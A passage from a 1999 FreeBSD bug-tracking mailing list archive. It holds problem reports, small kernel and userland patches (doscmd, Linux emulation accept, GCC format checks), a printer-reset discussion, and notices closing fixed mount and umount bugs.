for ; Fri, 17 Dec 1999 19:50:01 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id TAA18080; Fri, 17 Dec 1999 19:50:01 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: by hub.freebsd.org (Postfix, from userid 32767) id D218B14D8F; Fri, 17 Dec 1999 19:48:35 -0800 (PST) Message-Id: <19991218034835.D218B14D8F@hub.freebsd.org> Date: Fri, 17 Dec 1999 19:48:35 -0800 (PST) From: sakauchi@yamame.to To: freebsd-gnats-submit@freebsd.org X-Send-Pr-Version: www-1.0 Subject: i386/15547: discmd function 51 ( get ps ) fail Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org >Number: 15547 >Category: i386 >Synopsis: discmd function 51 ( get ps ) fail >Confidential: no >Severity: non-critical >Priority: low >Responsible: freebsd-bugs >State: open >Quarter: >Keywords: >Date-Required: >Class: sw-bug >Submitter-Id: current-users >Arrival-Date: Fri Dec 17 19:50:00 PST 1999 >Closed-Date: >Last-Modified: >Originator: Atushi Sakauchi >Release: FreeBSD 3.3-Release >Organization: >Environment: FreeBSD 3.3-Release >Description: doscmd DOS function 51 ( get PSP ) don't work. >How-To-Repeat: % discmd symdeb >Fix: --- /usr/src/usr.bin/doscmd/dos.c.save Mon Aug 30 00:26:58 1999 +++ /usr/src/usr.bin/doscmd/dos.c Sat Dec 18 04:47:13 1999 @@ -2352,7 +2353,7 @@ { 0x4e, IFT_NOSUBFUNC, int21_find, "findfirst"}, { 0x4f, IFT_NOSUBFUNC, int21_find, "findnext"}, { 0x50, IFT_NOSUBFUNC, int21_50, "set psp"}, - { 0x50, IFT_NOSUBFUNC, int21_62, "get psp"}, + { 0x51, IFT_NOSUBFUNC, int21_62, "get psp"}, { 0x52, IFT_NOSUBFUNC, int21_NOFUNC, "get LoL"}, { 0x53, IFT_NOSUBFUNC, int21_NOFUNC, "translate BPB to DPB"}, { 0x54, IFT_NOSUBFUNC, int21_NULLFUNC, "get verify flag"}, >Release-Note: >Audit-Trail: >Unformatted: To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Fri Dec 17 20:22:50 1999 Delivered-To: freebsd-bugs@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 2986614F82; Fri, 17 Dec 1999 20:22:49 -0800 (PST) (envelope-from deischen@FreeBSD.org) Received: (from deischen@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id UAA24390; Fri, 17 Dec 1999 20:22:49 -0800 (PST) (envelope-from deischen@FreeBSD.org) Date: Fri, 17 Dec 1999 20:22:49 -0800 (PST) From: Message-Id: <199912180422.UAA24390@freefall.freebsd.org> To: bryant@cs.usm.maine.edu, deischen@FreeBSD.org, freebsd-bugs@FreeBSD.org Subject: Re: bin/10992: pthread_kill() doesn't deliver signals to threads in blocking syscall Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Synopsis: pthread_kill() doesn't deliver signals to threads in blocking syscall State-Changed-From-To: analyzed->closed State-Changed-By: deischen State-Changed-When: Fri Dec 17 20:20:41 PST 1999 State-Changed-Why: Originator gives permission to close PR. Many thanks to Nathan Bryant for catching this bug. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Fri Dec 17 23:50:11 1999 Delivered-To: freebsd-bugs@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id C550715827 for ; Fri, 17 Dec 1999 23:50:02 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id XAA35954; Fri, 17 Dec 1999 23:50:02 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: by hub.freebsd.org (Postfix, from userid 32767) id 09B7814EF1; Fri, 17 Dec 1999 23:40:48 -0800 (PST) Message-Id: <19991218074048.09B7814EF1@hub.freebsd.org> Date: Fri, 17 Dec 1999 23:40:48 -0800 (PST) From: phandel@cise.ufl.edu To: freebsd-gnats-submit@freebsd.org X-Send-Pr-Version: www-1.0 Subject: i386/15548: Intel EtherExpress Pro/10+: Only 1024 bytes are transferred by the installer when installing via ftp Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org >Number: 15548 >Category: i386 >Synopsis: Intel EtherExpress Pro/10+: Only 1024 bytes are transferred by the installer when installing via ftp >Confidential: no >Severity: serious >Priority: medium >Responsible: freebsd-bugs >State: open >Quarter: >Keywords: >Date-Required: >Class: sw-bug >Submitter-Id: current-users >Arrival-Date: Fri Dec 17 23:50:01 PST 1999 >Closed-Date: >Last-Modified: >Originator: Peter Handel >Release: Any release > 2.2.8 has this bug >Organization: >Environment: FreeBSD adsl-78-160.gnv.bellsouth.net 2.2.8-RELEASE FreeBSD 2.2.8-RELEASE #0: Mon Nov 30 06:34:08 GMT 1998 jkh@time.cdrom.com:/usr/src/sys/compile/GENERI C i386 (This version works, but anything newer doesn't) This is on a Compaq ProLinea 486/33mhz 8MB RAM >Description: When doing an FTP install of FreeBSD > 2.2.8, the machine will hang at 1024 bytes. >How-To-Repeat: Install FreeBSD via FTP using an Intel EtherExpress Pro/10+ ISA card! >Fix: None >Release-Note: >Audit-Trail: >Unformatted: To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Sat Dec 18 2:10: 6 1999 Delivered-To: freebsd-bugs@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id E8BDF14F0E for ; Sat, 18 Dec 1999 02:10:02 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id CAA43647; Sat, 18 Dec 1999 02:10:02 -0800 (PST) (envelope-from gnats@FreeBSD.org) Date: Sat, 18 Dec 1999 02:10:02 -0800 (PST) Message-Id: <199912181010.CAA43647@freefall.freebsd.org> To: freebsd-bugs@FreeBSD.org Cc: From: Alexander Langer Subject: Re: kern/15532: Reboot just to kill a print job? Reply-To: Alexander Langer Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org The following reply was made to PR kern/15532; it has been noted by GNATS. From: Alexander Langer To: Juergen Lock Cc: FreeBSD-gnats-submit@FreeBSD.ORG Subject: Re: kern/15532: Reboot just to kill a print job? Date: Sat, 18 Dec 1999 11:06:09 +0100 Also sprach Juergen Lock (nox@jelal.kn-bremen.de): > old :), killed the job and powecycled the printer (there's no other > way to reset it i believe), but when i then sent the job again the > printer only got garbage. so i had to hit offline again... Yes, that happens to me every time I get those problems. Also try booting the machine while the printer prints. The same result. If you reboot your Windows box while the printer prints, the print-job is completed at exactly this page where it stopped next boot. > only fix seemed to be a reboot. :/ (Or is there some way for a > device on the parallel port to indicate a reset/poweroff that this > printer just doesn't use?) I usually use a combination of lpc down all lpc disable all killall lpd switch of the printer restart lpd switch on the printer lpc up all lpc enable all Soemthink _like_ this usually fixes it. Alex To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Sat Dec 18 5:40: 4 1999 Delivered-To: freebsd-bugs@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id BB22E14F2E for ; Sat, 18 Dec 1999 05:40:01 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id FAA56644; Sat, 18 Dec 1999 05:40:01 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: from smtp02.interq.net (smtp02.interq.net [210.157.0.16]) by hub.freebsd.org (Postfix) with ESMTP id 565BF14D7E for ; Sat, 18 Dec 1999 05:31:38 -0800 (PST) (envelope-from yakisoba@smtp.mymail.interq.or.jp) Received: from albert.einstein (sakai-ppp-210-172-177-190.interq.or.jp [210.172.177.190]) by smtp02.interq.net (8.9.0/8.9.1/matt89-pop) with ESMTP id WAA04889 for ; Sat, 18 Dec 1999 22:31:35 +0900 (JST) Received: (from yakisoba@localhost) by albert.einstein (8.9.3/3.7W) id UAA48942; Fri, 17 Dec 1999 20:23:35 +0900 (JST) Message-Id: <199912181331.WAA04889@smtp02.interq.net> Date: Fri, 17 Dec 1999 20:23:35 +0900 (JST) From: yakisoba@osaka.interq.or.jp Reply-To: yakisoba@osaka.interq.or.jp To: FreeBSD-gnats-submit@freebsd.org X-Send-Pr-Version: 3.2 Subject: gnu/15549: Fix -fformat-extensions support code merged into GCC 2.95.x Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org >Number: 15549 >Category: gnu >Synopsis: Fix -fformat-extensions support code merged into GCC 2.95.x >Confidential: no >Severity: non-critical >Priority: low >Responsible: freebsd-bugs >State: open >Quarter: >Keywords: >Date-Required: >Class: change-request >Submitter-Id: current-users >Arrival-Date: Sat Dec 18 05:40:01 PST 1999 >Closed-Date: >Last-Modified: >Originator: Naohiko Tsuji >Release: FreeBSD 4.0-CURRENT i386 >Organization: >Environment: FreeBSD 4.0-CURRENT i386 >Description: It has the difference between EGCS 1.1.2 and GCC 2.95.X about 'tfaff' in gcc/c-common.c. But '-fformat-extensions' support code has not been chaged yet. So, do 'make world', to found some warning. EGCS 1.1.2 static char tfaff [] = "...."; somewhat () { ... warning (tfaff); <-- ... } GCC 2.95.X static void tfaff () { warning ("..."); } somewhat () { ... tfaff (); <-- ... } >How-To-Repeat: >Fix: '-fformat-extensions' support code in gcc/c-common.c warning (tfaff); -> tfaff (); >Release-Note: >Audit-Trail: >Unformatted: To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Sat Dec 18 8:50: 4 1999 Delivered-To: freebsd-bugs@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 3CCBC14F3B for ; Sat, 18 Dec 1999 08:50:02 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id IAA22168; Sat, 18 Dec 1999 08:50:02 -0800 (PST) (envelope-from gnats@FreeBSD.org) Date: Sat, 18 Dec 1999 08:50:02 -0800 (PST) Message-Id: <199912181650.IAA22168@freefall.freebsd.org> To: freebsd-bugs@FreeBSD.org Cc: From: Juergen Lock Subject: Re: kern/15532: Reboot just to kill a print job? Reply-To: Juergen Lock Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org The following reply was made to PR kern/15532; it has been noted by GNATS. From: Juergen Lock To: Alexander Langer Cc: FreeBSD-gnats-submit@FreeBSD.ORG Subject: Re: kern/15532: Reboot just to kill a print job? Date: Sat, 18 Dec 1999 17:31:38 +0100 On Sat, Dec 18, 1999 at 11:06:09AM +0100, Alexander Langer wrote: > Also sprach Juergen Lock (nox@jelal.kn-bremen.de): > > > old :), killed the job and powecycled the printer (there's no other > > way to reset it i believe), but when i then sent the job again the > > printer only got garbage. so i had to hit offline again... > > Yes, that happens to me every time I get those problems. Sounds like you get paper jam often? (What printer is that?) > Also try booting the machine while the printer prints. The same > result. > Oh. even if you reset the printer too? > If you reboot your Windows box while the printer prints, the print-job > is completed at exactly this page where it stopped next boot. Whow :) sounds like one thing that M$ did get right. (Well of course a unix box isn't supposed to be rebooted as often as you need to reboot a crashed wintendo box... Or like, `The mouse cursor has moved. Please reboot for the change to take effect.') > > > only fix seemed to be a reboot. :/ (Or is there some way for a > > device on the parallel port to indicate a reset/poweroff that this > > printer just doesn't use?) > > I usually use a combination of > lpc down all > lpc disable all > killall lpd > > switch of the printer > restart lpd > > switch on the printer > lpc up all > lpc enable all > > Soemthink _like_ this usually fixes it. Hmm. Does that also help when the filter still hangs blocking on the printer device like in my case, with no signal being able to kill it? Somehow i doubt it... Regards, -- Juergen Lock (remove dot foo from address to reply) To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Sat Dec 18 9:20: 4 1999 Delivered-To: freebsd-bugs@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 13A0A14EEE for ; Sat, 18 Dec 1999 09:20:01 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id JAA23842; Sat, 18 Dec 1999 09:20:01 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: from mout00.kundenserver.de (mout00.kundenserver.de [195.20.224.69]) by hub.freebsd.org (Postfix) with ESMTP id D2FCE14EEE for ; Sat, 18 Dec 1999 09:10:09 -0800 (PST) (envelope-from kjwolf@seismic.de) Received: from [195.20.224.75] (helo=mrelay00.kundenserver.de) by mout00.kundenserver.de with esmtp (Exim 2.12 #2) id 11zNMu-0002Mo-00 for FreeBSD-gnats-submit@freebsd.org; Sat, 18 Dec 1999 18:10:08 +0100 Received: from [62.158.138.226] (helo=solling.seismic.de) by mrelay00.kundenserver.de with esmtp (Exim 2.12 #2) id 11zNMr-0004RF-00 for FreeBSD-gnats-submit@freebsd.org; Sat, 18 Dec 1999 18:10:06 +0100 Received: by solling.seismic.de (Postfix, from userid 100) id ABB5E19044; Sat, 18 Dec 1999 18:10:16 +0100 (CET) Received: by solling.seismic.de (Postfix, from userid 100) id E63AF1908E; Fri, 17 Dec 1999 18:12:22 +0100 (CET) Message-Id: <19991217171222.E63AF1908E@solling.seismic.de> Date: Fri, 17 Dec 1999 18:12:22 +0100 (CET) From: kjwolf@solling.seismic.de Reply-To: kjwolf@solling.seismic.de To: FreeBSD-gnats-submit@freebsd.org X-Send-Pr-Version: 3.2 Subject: bin/15551: Userland PPP (Client): Timeout not always recognized Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org >Number: 15551 >Category: bin >Synopsis: Userland PPP (Client): Timeout not always recognized >Confidential: no >Severity: critical >Priority: medium >Responsible: freebsd-bugs >State: open >Quarter: >Keywords: >Date-Required: >Class: sw-bug >Submitter-Id: current-users >Arrival-Date: Sat Dec 18 09:20:00 PST 1999 >Closed-Date: >Last-Modified: >Originator: Klaus-Juergen Wolf >Release: FreeBSD 3.3-STABLE-991213 i386 >Organization: >Environment: Pentium-II 300MHz 96MB, no load >Description: PPP userland/client sometimes fails to recognize the timeout set with "set timeout" in /etc/ppp/ppp.conf. (It worked with the same settings all the time before with recent versions.) That means that the -auto upped line never (?) gets down again (and therefore might produce vast amounts of costs). >How-To-Repeat: Unknown. >Fix: Unknown. >Release-Note: >Audit-Trail: >Unformatted: To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Sat Dec 18 13:30: 5 1999 Delivered-To: freebsd-bugs@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 382CA14F37 for ; Sat, 18 Dec 1999 13:30:01 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id NAA38942; Sat, 18 Dec 1999 13:30:01 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: by hub.freebsd.org (Postfix, from userid 32767) id B102F14A2E; Sat, 18 Dec 1999 13:25:11 -0800 (PST) Message-Id: <19991218212511.B102F14A2E@hub.freebsd.org> Date: Sat, 18 Dec 1999 13:25:11 -0800 (PST) From: kumabu@t3.rim.or.jp To: freebsd-gnats-submit@freebsd.org X-Send-Pr-Version: www-1.0 Subject: i386/15553: Linux Emulation don't emulate accept(2) exactly Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org >Number: 15553 >Category: i386 >Synopsis: Linux Emulation don't emulate accept(2) exactly >Confidential: no >Severity: serious >Priority: medium >Responsible: freebsd-bugs >State: open >Quarter: >Keywords: >Date-Required: >Class: sw-bug >Submitter-Id: current-users >Arrival-Date: Sat Dec 18 13:30:00 PST 1999 >Closed-Date: >Last-Modified: >Originator: Shin'ya Kumabuchi >Release: 3.1-RELEASE or above >Organization: >Environment: FreeBSD blankey 3.1-RELEASE FreeBSD 3.1-RELEASE #0: Sun Jul 4 18:05:38 JST 1999 kumabu1@blankey:/usr/src/sys/compile/PAO_KUMA i386 >Description: Linux's accept(2) seems new socket doesn't inherit listening socket's file flags.(though RedHat's accept(2) man describes ``creates a new socket with the same properties of s ...'') But FreeBSD's accept(2) creates new socket with the exactly same properties of parent. And same the Linux Emulation. (SunOS 5.x is same, 4.x not) So some Linux program under emulation doesn't work correctly. >How-To-Repeat: // simple test code in C socket() & bind() & listen() fcntl(sock, F_SETFL, O_NONBLOCK | fcntl(sock, F_GETFL, 0)); printf("0x%08x\n", fcntl(sock, F_GETFL)); new_sock = accept(...); printf("0x%08x\n", fcntl(new_sock, F_GETFL)); // Linux(non emulation) blocks here, but emulation occurs EAGAIN read(new_sock, buf, 1); I found this in linux JDK1.2pre-v2(& 1.2.2-RC3) with emulation. // in Java code Socket sock = new ServerSocket(3000).accept(); // read() causes Exception on Linux Emulation, // if no available data has received sock.getInputStream().read(); >Fix: I modified /sys/i386/linux/linux_socket.c(1.16) as below diff and Linux (blackdown's)JDK works expectedly. I don't know this is appropriate at all, but the least O_NONBLOCK shouldn't be inherited to new socket in Linux Emulation mode. --- linux_socket.c.~1~ Sun Dec 19 05:39:34 1999 +++ linux_socket.c Sun Dec 19 05:52:04 1999 @@ -43,6 +43,9 @@ #include #include +#include +#include + #include #include #include @@ -448,7 +451,19 @@ bsd_args.s = linux_args.s; bsd_args.name = (caddr_t)linux_args.addr; bsd_args.anamelen = linux_args.namelen; +#if 0 return oaccept(p, &bsd_args); +#else + { + struct file *fp; + error = oaccept(p, &bsd_args); + if (!error) { + getsock(p->p_fd, p->p_retval[0], &fp); + fp->f_flag = O_RDWR; + } + return error; + } +#endif } struct linux_getsockname_args { >Release-Note: >Audit-Trail: >Unformatted: To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Sat Dec 18 14:40: 7 1999 Delivered-To: freebsd-bugs@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id C4F0014E9C; Sat, 18 Dec 1999 14:40:05 -0800 (PST) (envelope-from cpiazza@FreeBSD.org) Received: (from cpiazza@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id OAA43278; Sat, 18 Dec 1999 14:40:05 -0800 (PST) (envelope-from cpiazza@FreeBSD.org) Date: Sat, 18 Dec 1999 14:40:05 -0800 (PST) From: Message-Id: <199912182240.OAA43278@freefall.freebsd.org> To: cpiazza@FreeBSD.org, freebsd-bugs@FreeBSD.org, obrien@FreeBSD.org Subject: Re: gnu/15549: Fix -fformat-extensions support code merged into GCC 2.95.x Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Synopsis: Fix -fformat-extensions support code merged into GCC 2.95.x Responsible-Changed-From-To: freebsd-bugs->obrien Responsible-Changed-By: cpiazza Responsible-Changed-When: Sat Dec 18 14:39:36 PST 1999 Responsible-Changed-Why: obrien imported this To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Sat Dec 18 15:36:11 1999 Delivered-To: freebsd-bugs@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id B85B8150C7; Sat, 18 Dec 1999 15:36:10 -0800 (PST) (envelope-from green@FreeBSD.org) Received: (from green@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id PAA46979; Sat, 18 Dec 1999 15:36:10 -0800 (PST) (envelope-from green@FreeBSD.org) Date: Sat, 18 Dec 1999 15:36:10 -0800 (PST) From: Message-Id: <199912182336.PAA46979@freefall.freebsd.org> To: Jos.Backus@nl.origin-it.com, green@FreeBSD.org, freebsd-bugs@FreeBSD.org Subject: Re: bin/7846: /sbin/mount_* do not canonicalize the mount node pathname. Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Synopsis: /sbin/mount_* do not canonicalize the mount node pathname. State-Changed-From-To: open->closed State-Changed-By: green State-Changed-When: Sat Dec 18 15:35:30 PST 1999 State-Changed-Why: This has been fixed in -CURRENT and 3.3/3.4. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Sat Dec 18 15:36:49 1999 Delivered-To: freebsd-bugs@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id C378C14F15; Sat, 18 Dec 1999 15:36:48 -0800 (PST) (envelope-from green@FreeBSD.org) Received: (from green@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id PAA47072; Sat, 18 Dec 1999 15:36:48 -0800 (PST) (envelope-from green@FreeBSD.org) Date: Sat, 18 Dec 1999 15:36:48 -0800 (PST) From: Message-Id: <199912182336.PAA47072@freefall.freebsd.org> To: logix@foobar.franken.de, green@FreeBSD.org, freebsd-bugs@FreeBSD.org Subject: Re: bin/13692: umount(8) does not unmount filesystems with a trailing slash Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Synopsis: umount(8) does not unmount filesystems with a trailing slash State-Changed-From-To: open->closed State-Changed-By: green State-Changed-When: Sat Dec 18 15:36:20 PST 1999 State-Changed-Why: This has been fixed in -CURRENT and 3.3/3.4. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Sat Dec 18 15:39:27 1999 Delivered-To: freebsd-bugs@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 9E1291500D; Sat, 18 Dec 1999 15:39:26 -0800 (PST) (envelope-from green@FreeBSD.org) Received: (from green@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id PAA47318; Sat, 18 Dec 1999 15:39:26 -0800 (PST) (envelope-from green@FreeBSD.org) Date: Sat, 18 Dec 1999 15:39:26 -0800 (PST) From: Message-Id: <199912182339.PAA47318@freefall.freebsd.org> To: cjc@cc942873-a.ewndsr1.nj.home.com, green@FreeBSD.org, freebsd-bugs@FreeBSD.org Subject: Re: bin/14709: umountall requests possibly mishandled by mountd(8) Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Synopsis: umountall requests possibly mishandled by mountd(8) State-Changed-From-To: open->closed State-Changed-By: green State-Changed-When: Sat Dec 18 15:39:03 PST 1999 State-Changed-Why: This has been fixed in -CURRENT and 3.3/3.4. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Sat Dec 18 15:40: 5 1999 Delivered-To: freebsd-bugs@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 7A2C7150B8; Sat, 18 Dec 1999 15:40:02 -0800 (PST) (envelope-from green@FreeBSD.org) Received: (from green@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id PAA47424; Sat, 18 Dec 1999 15:40:02 -0800 (PST) (envelope-from green@FreeBSD.org) Date: Sat, 18 Dec 1999 15:40:02 -0800 (PST) From: Message-Id: <199912182340.PAA47424@freefall.freebsd.org> To: dada@sbox.tu-graz.ac.at, green@FreeBSD.org, freebsd-bugs@FreeBSD.org Subject: Re: bin/9893: NFS umount of regular file impossible Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Synopsis: NFS umount of regular file impossible State-Changed-From-To: open->closed State-Changed-By: green State-Changed-When: Sat Dec 18 15:39:27 PST 1999 State-Changed-Why: This has been fixed in -CURRENT and 3.3/3.4. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Sat Dec 18 15:40: 6 1999 Delivered-To: freebsd-bugs@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id B9D161507D for ; Sat, 18 Dec 1999 15:40:01 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id PAA47411; Sat, 18 Dec 1999 15:40:01 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: from punitive-surgery.lcs.mit.edu (punitive-surgery.lcs.mit.edu [18.26.4.18]) by hub.freebsd.org (Postfix) with ESMTP id DCA2214F56 for ; Sat, 18 Dec 1999 15:30:36 -0800 (PST) (envelope-from dm@punitive-surgery.lcs.mit.edu) Received: (from dm@localhost) by punitive-surgery.lcs.mit.edu (8.9.3/8.9.3) id SAA38082; Sat, 18 Dec 1999 18:31:15 -0500 (EST) (envelope-from dm) Message-Id: <199912182331.SAA38082@punitive-surgery.lcs.mit.edu> Date: Sat, 18 Dec 1999 18:31:15 -0500 (EST) From: dm@reeducation-labor.lcs.mit.edu Reply-To: dm@reeducation-labor.lcs.mit.edu To: FreeBSD-gnats-submit@freebsd.org X-Send-Pr-Version: 3.2 Subject: kern/15554: malloc fails in OMAGIC programs Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org >Number: 15554 >Category: kern >Synopsis: malloc fails in OMAGIC programs >Confidential: no >Severity: serious >Priority: medium >Responsible: freebsd-bugs >State: open >Quarter: >Keywords: >Date-Required: >Class: sw-bug >Submitter-Id: current-users >Arrival-Date: Sat Dec 18 15:40:00 PST 1999 >Closed-Date: >Last-Modified: >Originator: David Mazieres >Release: FreeBSD 3.3-RELEASE i386 >Organization: >Environment: i386 machine running stock FreeBSD-3.3-RELEASE (including generic kernel) >Description: Memory allocation files in OMAGIC programs. >How-To-Repeat: Compile and run this program: #include #include #include #include int main (int argc, char **argv) { char *p = malloc (8192); if (!p) { char badmalloc[] = "malloc failed\n"; write (2, badmalloc, sizeof (badmalloc)); write (2, strerror (errno), strlen (strerror (errno))); write (2, "\n", 1); exit (1); } exit (0); } /* --- end --- */ like this: % cc -static -N -o badomagic badomagic.c % ./badomagic malloc failed Cannot allocate memory % >Fix: unknown >Release-Note: >Audit-Trail: >Unformatted: To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Sat Dec 18 15:41: 2 1999 Delivered-To: freebsd-bugs@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 62F3C150E5; Sat, 18 Dec 1999 15:41:01 -0800 (PST) (envelope-from green@FreeBSD.org) Received: (from green@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id PAA47517; Sat, 18 Dec 1999 15:41:01 -0800 (PST) (envelope-from green@FreeBSD.org) Date: Sat, 18 Dec 1999 15:41:01 -0800 (PST) From: Message-Id: <199912182341.PAA47517@freefall.freebsd.org> To: hsu@clinet.fi, green@FreeBSD.org, freebsd-bugs@FreeBSD.org Subject: Re: bin/841: stale nfs mounts cannot be umounted Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Synopsis: stale nfs mounts cannot be umounted State-Changed-From-To: suspended->closed State-Changed-By: green State-Changed-When: Sat Dec 18 15:40:03 PST 1999 State-Changed-Why: This has been fixed in -CURRENT and 3.3/3.4. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Sat Dec 18 15:42: 2 1999 Delivered-To: freebsd-bugs@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id C377F14E44; Sat, 18 Dec 1999 15:42:00 -0800 (PST) (envelope-from green@FreeBSD.org) Received: (from green@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id PAA47709; Sat, 18 Dec 1999 15:42:00 -0800 (PST) (envelope-from green@FreeBSD.org) Date: Sat, 18 Dec 1999 15:42:00 -0800 (PST) From: Message-Id: <199912182342.PAA47709@freefall.freebsd.org> To: venglin@lubi.FreeBSD.lublin.pl, green@FreeBSD.org, freebsd-bugs@FreeBSD.org Subject: Re: bin/14406: [SECURITY] strcpy() buffer overflow in umount(8) Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Synopsis: [SECURITY] strcpy() buffer overflow in umount(8) State-Changed-From-To: open->closed State-Changed-By: green State-Changed-When: Sat Dec 18 15:41:14 PST 1999 State-Changed-Why: This has been fixed in -CURRENT and 3.3/3.4. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Sat Dec 18 17:50: 5 1999 Delivered-To: freebsd-bugs@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 